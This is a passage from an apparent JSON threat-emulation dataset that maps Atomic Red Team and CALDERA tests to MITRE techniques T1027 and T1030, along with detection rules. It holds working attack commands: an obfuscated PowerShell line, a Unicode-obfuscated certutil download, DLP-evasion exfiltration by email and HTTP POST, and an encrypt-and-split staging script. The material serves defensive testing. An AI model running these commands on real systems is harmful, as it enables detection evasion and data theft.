When successfully executed, calculator.exe will open.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "url_path": { + "description": "url to download Exe", + "type": "Url", + "default": "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "T1027.exe must exist on disk at $env:temp\\temp_T1027.zip\\T1027.exe\n", + "prereq_command": "if (Test-Path $env:temp\\temp_T1027.zip\\T1027.exe) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest \"#{url_path}\" -OutFile \"$env:temp\\T1027.zip\"\nExpand-Archive -path \"$env:temp\\T1027.zip\" -DestinationPath \"$env:temp\\temp_T1027.zip\\\" -Force\n" + } + ], + "executor": { + "command": "\"%temp%\\temp_T1027.zip\\T1027.exe\"\n", + "cleanup_command": "taskkill /f /im calculator.exe >nul 2>nul\nrmdir /S /Q %temp%\\temp_T1027.zip >nul 2>nul\ndel /Q \"%temp%\\T1027.zip\" >nul 2>nul\n", + "name": "command_prompt" + } + }, + { + "name": "DLP Evasion via Sensitive Data in VBA Macro over email", + "auto_generated_guid": "129edb75-d7b8-42cd-a8ba-1f3db64ec4ad", + "description": "Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email.\nSensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_file": { + "description": "Path of the XLSM file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1027\\src\\T1027-cc-macro.xlsm" + }, + "sender": { + "description": "sender email", + "type": "String", + "default": "test@corp.com" + }, + "receiver": { + "description": "receiver email", + "type": "String", + "default": "test@corp.com" + }, + "smtp_server": { + "description": "SMTP Server IP Address", + 
"type": "String", + "default": "127.0.0.1" + } + }, + "executor": { + "command": "Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}\n", + "name": "powershell" + } + }, + { + "name": "DLP Evasion via Sensitive Data in VBA Macro over HTTP", + "auto_generated_guid": "e2d85e66-cb66-4ed7-93b1-833fc56c9319", + "description": "Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP.\nSensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_file": { + "description": "Path of the XLSM file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1027\\src\\T1027-cc-macro.xlsm" + }, + "ip_address": { + "description": "Destination IP address", + "type": "String", + "default": "127.0.0.1" + } + }, + "executor": { + "command": "Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}\n", + "name": "powershell" + } + }, + { + "name": "Obfuscated Command in PowerShell", + "auto_generated_guid": "8b3f4ed6-077b-4bdd-891c-2d237f19410f", + "description": "This is an obfuscated PowerShell command which when executed prints \"Hello, from PowerShell!\". 
Example is from the 2021 Threat Detection Report by Red Canary.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$cmDwhy =[TyPe](\"{0}{1}\" -f 'S','TrING') ; $pz2Sb0 =[TYpE](\"{1}{0}{2}\"-f'nv','cO','ert') ; &(\"{0}{2}{3}{1}{4}\" -f'In','SiO','vOKe-EXp','ReS','n') ( (&(\"{1}{2}{0}\"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y')).\"v`ALUe\"::(\"{1}{0}\" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::\"t`OinT`16\"(( [sTring]${_}) ,8)))})) )\n", + "name": "powershell" + } + }, + { + "name": "Obfuscated Command Line using special Unicode characters", + "auto_generated_guid": "e68b945c-52d0-4dd9-a5e8-d173d70c448f", + "description": "This is an obfuscated certutil command that when executed downloads a file from the web. Adapted from T1105. Obfuscation includes special options chars (unicode hyphens), character substitution (e.g. \u1da0) and character insertion (including the usage of the right-to-left 0x202E and left-to-right 0x202D override characters).\nReference:\nhttps://wietze.github.io/blog/windows-command-line-obfuscation\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_file": { + "description": "URL of file to download", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt" + }, + "local_path": { + "description": "Local path/filename to save the dowloaded file to", + "type": "Path", + "default": "Atomic-license.txt" + } + }, + "executor": { + "steps": "1. Copy the following command into the command prompt after replacing #{remote_file} and #{local_path} with your desired URL and filename.\n\n\n certutil \u2014\u0af9u\u0af0rl\u08b0ca\u08e2c\u0defhe \u2013\u202espli\u0605t\u202e\u202d \u2212\"\u0d4f\u1da0\u0d78\" #{remote_file} #{local_path}\n\n\n2. 
Press enter to execute the command. You will find the file or webpage you specified saved to the file you specified in the command.\n", + "name": "manual" + } + } + ] + }, + { + "chain_id": "100001", + "os": "windows", + "parent_process": "[a-z0-9]{1}.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "obfuscation", + "mitre_attack": "T1027", + "itw_sample": "3d77bf4f5d40aa7fff1c59058bf89e0349fa14e3260bbc290b836cbb1e1a17b7" + }, + { + "chain_id": "100123", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "\\*.exe\\:Zone.Identifier:$DATA\" ", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "alternate_data_stream", + "mitre_attack": "T1027", + "itw_sample": "b3c4ae251f8094fa15b510051835c657eaef2a6cea46075d3aec964b14a99f68" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"certutil.exe\" and process_command_line contains \"encode\")or process_command_line contains \"ToBase64String\"", + "name": "Obfuscated Files Or Information" + } + ], + "possible_detections": [ + { + "title": "Executable in ADS", + "id": "b69888d4-380c-45ce-9cf9-d9ce46e67821", + "status": "experimental", + "description": "Detects the creation of an ADS data stream that contains an executable (non-empty imphash)", + "references": [ + "https://twitter.com/0xrawsec/status/1002478725605273600?s=21" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.s0139" + ], + "author": "Florian Roth, @0xrawsec", + "date": "2018/06/03", + "logsource": { + "product": "windows", + "service": "sysmon", + "definition": "Requirements: Sysmon config with Imphash logging activated" + }, + 
"detection": { + "selection": { + "EventID": 15 + }, + "filter": { + "Imphash": "00000000000000000000000000000000" + }, + "condition": "selection and not filter" + }, + "fields": [ + "TargetFilename", + "Image" + ], + "falsepositives": [ + "unknown" + ], + "level": "critical" + }, + { + "title": "Ping Hex IP", + "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "description": "Detects a ping command that uses a hex encoded IP address", + "references": [ + "https://github.com/vysec/Aggressor-VYSEC/blob/master/ping.cna", + "https://twitter.com/vysecurity/status/977198418354491392" + ], + "author": "Florian Roth", + "date": "2018/03/23", + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.t1027" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "*\\ping.exe 0x*", + "*\\ping 0x*" + ] + }, + "condition": "selection" + }, + "fields": [ + "ParentCommandLine" + ], + "falsepositives": [ + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + ], + "level": "high" + }, + [ + "5156", + "Windows Firewall" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "Windows event logs" + ], + [ + "4663 - File Auditing", + "File monitoring" + ], + [ + "B9", + "Bninary file metadata" + ], + [ + "Malware reverse engineering" + ], + [ + "Environment variable" + ], + [ + "Network protocol analysis" + ], + [ + "Network intrusion", + "detection system" + ], + [ + "Email gateway" + ], + [ + "SSL/TLS inspection" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File monitoring" + ], + [ + "LOG-MD - B9", + "Bninary file metadata" + ], + [ + "Windows event logs" + ], + [ + "Network protocol analysis" + ], + [ + "Malware reverse engineering" + ], + [ + "Environment variable" + ], + [ + "Network intrusion detection system" + ], + [ + "Email gateway" + ], + [ + "SSL/TLS inspection" + ], + { + "data_source": "file", + 
"definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + 
"Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + 
"target_data_element": "command" + } + ], + "external_reference": [ + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", + "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/", + "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://www.justice.gov/file/1080281/download", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://blog.morphisec.com/cobalt-gang-2.0", + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", + "https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + 
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "https://securelist.com/darkhotels-attacks-in-2015/71713/", + "https://citizenlab.org/2016/08/group5-syria/", + "https://github.com/danielbohannon/Invoke-Obfuscation", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/", + "https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", 
+ "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/", + "https://securelist.com/luckymouse-hits-national-data-center/86083/", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://securelist.com/muddywater/88059/", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1030", + "command_list": [ + "cd #{folder_path}; split -b 5000000 T1030_urandom\nls -l #{folder_path}\n", + "cd /tmp/T1030; split -b 5000000 #{file_name}\nls -l /tmp/T1030\n", + "tar -C #{host.dir.staged} -czf - . 
| gpg -c --pinentry-mode=loopback --passphrase '#{host.archive.password}' > #{host.dir.staged}.tar.gz.gpg;\nsplit -b#{file.size.chunk} '#{host.dir.staged}.tar.gz.gpg' '#{host.dir.staged}'/calderachunk;\nrm '#{host.dir.staged}.tar.gz.gpg';\nfind '#{host.dir.staged}' -maxdepth 1 -name 'calderachunk*' 2>/dev/null;\n", + "& \"C:\\Program Files\\7-Zip\\7z.exe\" a \"#{host.dir.staged}.7z\" \"#{host.dir.staged}\\*\" '-p#{host.archive.password}' | Out-Null;\nsleep 2;\n$Archive = Get-Item -Path \"#{host.dir.staged}.7z\";\n$StageDir = \"#{host.dir.staged}\";\n$BaseName = $StageDir + \"\\calderachunk\";\n$UpperBound = [int32]\"#{file.size.chunk}\";\n$Content = [IO.File]::OpenRead($Archive);\n$buff = New-Object byte[] $UpperBound;\n$Bytes = $idx = 0;\ntry {\n do {\n $Bytes = $Content.Read($buff, 0, $buff.Length);\n if ($Bytes -gt 0) {\n $ChunkName = \"{0}{1}\" -f ($BaseName, $idx.ToString().PadLeft(3,'0'));\n $ChunkFile = [IO.File]::OpenWrite($ChunkName);\n try {\n $ChunkFile.Write($buff, 0, $Bytes);\n } finally {\n $ChunkFile.Close();\n }\n }\n $idx ++;\n } while ($Bytes -gt 0)\n}\nfinally {\n $Content.Close();\n}\nRemove-Item $Archive;\nGet-ChildItem -Path \"$StageDir\\calderachunk*\" | foreach {$_.FullName} | Select-Object;\n" + ], + "commands": [ + { + "command": "cd #{folder_path}; split -b 5000000 T1030_urandom\nls -l #{folder_path}\n", + "source": "atomics/T1030/T1030.yaml", + "name": "Atomic Red Team Test - Data Transfer Size Limits" + }, + { + "command": "cd /tmp/T1030; split -b 5000000 #{file_name}\nls -l /tmp/T1030\n", + "source": "atomics/T1030/T1030.yaml", + "name": "Atomic Red Team Test - Data Transfer Size Limits" + }, + { + "command": "tar -C #{host.dir.staged} -czf - . 
| gpg -c --pinentry-mode=loopback --passphrase '#{host.archive.password}' > #{host.dir.staged}.tar.gz.gpg;\nsplit -b#{file.size.chunk} '#{host.dir.staged}.tar.gz.gpg' '#{host.dir.staged}'/calderachunk;\nrm '#{host.dir.staged}.tar.gz.gpg';\nfind '#{host.dir.staged}' -maxdepth 1 -name 'calderachunk*' 2>/dev/null;\n", + "source": "data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml", + "name": "This ability will compress the staged files into a password protected archive and break it\ninto smaller chunks based on the given byte size. The original archive will be automatically\ndeleted. Use this instead of other archiving abilities if small file sizes for exfiltration \nare desired. When used with an exfiltration ability, the exfiltration ability will run numerous\ntimes in an operation depending on how many chunks are created. \n" + }, + { + "command": "& \"C:\\Program Files\\7-Zip\\7z.exe\" a \"#{host.dir.staged}.7z\" \"#{host.dir.staged}\\*\" '-p#{host.archive.password}' | Out-Null;\nsleep 2;\n$Archive = Get-Item -Path \"#{host.dir.staged}.7z\";\n$StageDir = \"#{host.dir.staged}\";\n$BaseName = $StageDir + \"\\calderachunk\";\n$UpperBound = [int32]\"#{file.size.chunk}\";\n$Content = [IO.File]::OpenRead($Archive);\n$buff = New-Object byte[] $UpperBound;\n$Bytes = $idx = 0;\ntry {\n do {\n $Bytes = $Content.Read($buff, 0, $buff.Length);\n if ($Bytes -gt 0) {\n $ChunkName = \"{0}{1}\" -f ($BaseName, $idx.ToString().PadLeft(3,'0'));\n $ChunkFile = [IO.File]::OpenWrite($ChunkName);\n try {\n $ChunkFile.Write($buff, 0, $Bytes);\n } finally {\n $ChunkFile.Close();\n }\n }\n $idx ++;\n } while ($Bytes -gt 0)\n}\nfinally {\n $Content.Close();\n}\nRemove-Item $Archive;\nGet-ChildItem -Path \"$StageDir\\calderachunk*\" | foreach {$_.FullName} | Select-Object;\n", + "source": "data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml", + "name": "This ability will compress the staged files into a password protected archive and break it\ninto smaller 
chunks based on the given byte size. The original archive will be automatically\ndeleted. Use this instead of other archiving abilities if small file sizes for exfiltration \nare desired. When used with an exfiltration ability, the exfiltration ability will run numerous\ntimes in an operation depending on how many chunks are created. \n" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1030", + "display_name": "Data Transfer Size Limits", + "atomic_tests": [ + { + "name": "Data Transfer Size Limits", + "auto_generated_guid": "ab936c51-10f4-46ce-9144-e02137b2016a", + "description": "Take a file/directory, split it into 5Mb chunks\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "file_name": { + "description": "File name", + "type": "Path", + "default": "T1030_urandom" + }, + "folder_path": { + "description": "Path where the test creates artifacts", + "type": "Path", + "default": "/tmp/T1030" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "The file must exist for the test to run.", + "prereq_command": "if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1\n" + } + ], + "executor": { + "command": "cd #{folder_path}; split -b 5000000 #{file_name}\nls -l #{folder_path}\n", + "cleanup_command": "if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;\n", + "name": "sh" + } + } + ] + }, + { + "id": "5c5b0392-1daa-45e1-967c-2f361ce78849", + "name": "Compress Staged Directory (Password Protected) and Split Into Smaller Chunks", + "description": "This ability will compress the staged files into a password protected archive and break it\ninto smaller chunks based on the given byte size. The original archive will be automatically\ndeleted. 
Use this instead of other archiving abilities if small file sizes for exfiltration \nare desired. When used with an exfiltration ability, the exfiltration ability will run numerous\ntimes in an operation depending on how many chunks are created. \n", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1030", + "name": "Data Transfer Size Limits" + }, + "platforms": { + "linux": { + "sh": { + "command": "tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase '#{host.archive.password}' > #{host.dir.staged}.tar.gz.gpg;\nsplit -b#{file.size.chunk} '#{host.dir.staged}.tar.gz.gpg' '#{host.dir.staged}'/calderachunk;\nrm '#{host.dir.staged}.tar.gz.gpg';\nfind '#{host.dir.staged}' -maxdepth 1 -name 'calderachunk*' 2>/dev/null;\n", + "cleanup": "find '#{host.dir.staged}' -maxdepth 1 -name 'calderachunk*' -exec rm -rf {} \\;\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.compress" + } + ] + } + } + }, + "windows": { + "psh": { + "command": "& \"C:\\Program Files\\7-Zip\\7z.exe\" a \"#{host.dir.staged}.7z\" \"#{host.dir.staged}\\*\" '-p#{host.archive.password}' | Out-Null;\nsleep 2;\n$Archive = Get-Item -Path \"#{host.dir.staged}.7z\";\n$StageDir = \"#{host.dir.staged}\";\n$BaseName = $StageDir + \"\\calderachunk\";\n$UpperBound = [int32]\"#{file.size.chunk}\";\n$Content = [IO.File]::OpenRead($Archive);\n$buff = New-Object byte[] $UpperBound;\n$Bytes = $idx = 0;\ntry {\n do {\n $Bytes = $Content.Read($buff, 0, $buff.Length);\n if ($Bytes -gt 0) {\n $ChunkName = \"{0}{1}\" -f ($BaseName, $idx.ToString().PadLeft(3,'0'));\n $ChunkFile = [IO.File]::OpenWrite($ChunkName);\n try {\n $ChunkFile.Write($buff, 0, $Bytes);\n } finally {\n $ChunkFile.Close();\n }\n }\n $idx ++;\n } while ($Bytes -gt 0)\n}\nfinally {\n $Content.Close();\n}\nRemove-Item $Archive;\nGet-ChildItem -Path \"$StageDir\\calderachunk*\" | foreach {$_.FullName} | Select-Object;\n", + "cleanup": "Get-ChildItem -Path 
\"$StageDir\\calderachunk*\" | Remove-Item;\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.compress" + } + ] + } + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.staged" + } + ] + } + ] + } + ], + "queries": [], + "possible_detections": [ + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
